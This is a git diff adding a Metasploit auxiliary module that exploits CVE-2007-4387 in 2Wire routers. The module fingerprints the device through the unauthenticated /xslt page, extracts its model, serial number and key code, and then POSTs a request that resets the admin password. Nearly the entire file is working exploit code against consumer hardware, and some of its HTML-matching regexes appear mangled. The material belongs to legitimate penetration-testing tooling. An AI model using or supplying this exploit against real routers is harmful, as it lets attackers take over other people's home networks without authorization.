diff --git a/modules/auxiliary/admin/2wire/xslt_password_reset.rb b/modules/auxiliary/admin/2wire/xslt_password_reset.rb
new file mode 100644
index 0000000000..088400e3c8
--- /dev/null
+++ b/modules/auxiliary/admin/2wire/xslt_password_reset.rb
@@ -0,0 +1,145 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "2Wire Cross-Site Request Forgery Password Reset Vulnerability",
+ 'Description' => %q{
+ This module will reset the admin password on a 2Wire wireless router. This is
+ done by using the /xslt page where authentication is not required, thus allowing
+ configuration changes (such as resetting the password) as administrators.
+ },
+ 'License' => MSF_LICENSE,
+ 'Version' => "$Revision$",
+ 'Author' =>
+ [
+ 'hkm', #Initial discovery, poc
+ 'Travis Phillips', #Msf module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2007-4387' ],
+ [ 'OSVDB', '37667' ],
+ [ 'BID', '36075' ],
+ [ 'URL', 'http://seclists.org/bugtraq/2007/Aug/225' ],
+ ],
+ 'DisclosureDate' => "Aug 15 2007" ))
+
+ register_options(
+ [
+ Opt::RPORT(80),
+ OptString.new('PASSWORD', [ true, 'The password to reset to', 'admin'])
+ ], self.class)
+ end
+
+ def run
+
+ print_status("Attempting to connect to http://#{rhost}/xslt?PAGE=A07 to gather information")
+ res = send_request_raw(
+ {
+ 'method' => 'GET',
+ 'uri' => '/xslt?PAGE=A07',
+ }, 25)
+
+ #check to see if we get HTTP OK
+ if (res.code == 200)
+ print_status("Okay, Got an HTTP 200 (okay) code. Verifying Server header")
+ else
+ print_error("Did not get HTTP 200, URL was not found. Exiting!")
+ return
+ end
+
+ #Check to verify server reported is a 2wire router
+ if (res.headers['Server'].match(/2wire Gateway/i))
+ print_status("Server is a 2wire Gateway! Grabing info\n")
+ else
+ print_error("Target doesn't seem to be a 2wire router. Exiting!")
+ return
+ end
+
+ print_status("---===[ Router Information ]===---")
+
+ # Grabbing the Model Number
+ if res.body.match(/| (.*)<\/td>/i)
+ model = $1
+ print_status("Model: #{model}")
+ end
+
+ # Grabbing the serial Number
+ if res.body.match(/ | (\d{12})<\/td>/i)
+ serial = $1
+ print_status("Serial: #{serial}")
+ end
+
+ # Grabbing the Hardware Version
+ if res.body.match(/ | (\d{4}-\d{6}-\d{3})<\/td>/i)
+ hardware = $1
+ print_status("Hardware Version: #{hardware}")
+ end
+
+ #Check the Software Version
+ if res.body.match(/ | (5\.\d{1,3}\.\d{1,3}\.\d{1,3})<\/td>/i)
+ ver = $1
+ print_status("Software version: #{ver}")
+ else
+ print_error("Target is not a version 5 router. Exiting!")
+ return
+ end
+
+ # Grabbing the Key Code
+ if res.body.match(/ | (\w{4}-\w{4}-\w{4}-\w{4}-\w{4})<\/td>/i)
+ key = $1
+ print_status("Key Code: #{key}\n")
+ end
+
+ print_status("Attempting to exploit Password Reset Vulnerability on #{rhost}")
+ print_status("Connecting to http://#{rhost}/xslt?PAGE=H04 to make sure page exist.")
+
+ res = send_request_raw(
+ {
+ 'method' => 'GET',
+ 'uri' => '/xslt?PAGE=H04',
+ }, 25)
+
+ if ( res.code == 200 and res.body.match(/System Setup - Password<\/title>/i))
+ print_status("Found password reset page. Attempting to reset admin password to #{datastore['PASSWORD']}")
+
+ data = 'PAGE=H04_POST'
+ data << '&THISPAGE=H04'
+ data << '&NEXTPAGE=A01'
+ data << '&PASSWORD=' + datastore['PASSWORD']
+ data << '&PASSWORD_CONF=' + datastore['PASSWORD']
+ data << '&HINT='
+
+ res = send_request_cgi(
+ {
+ 'method' => 'POST',
+ 'uri' => '/xslt',
+ 'data' => data,
+ }, 25)
+
+ if res.code == 200
+ if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/(.*); path=\//))
+ cookie= $1
+ print_status("Got cookie #{cookie}. Password reset was successful!\n")
+ end
+ end
+ end
+
+ end
+
+end
|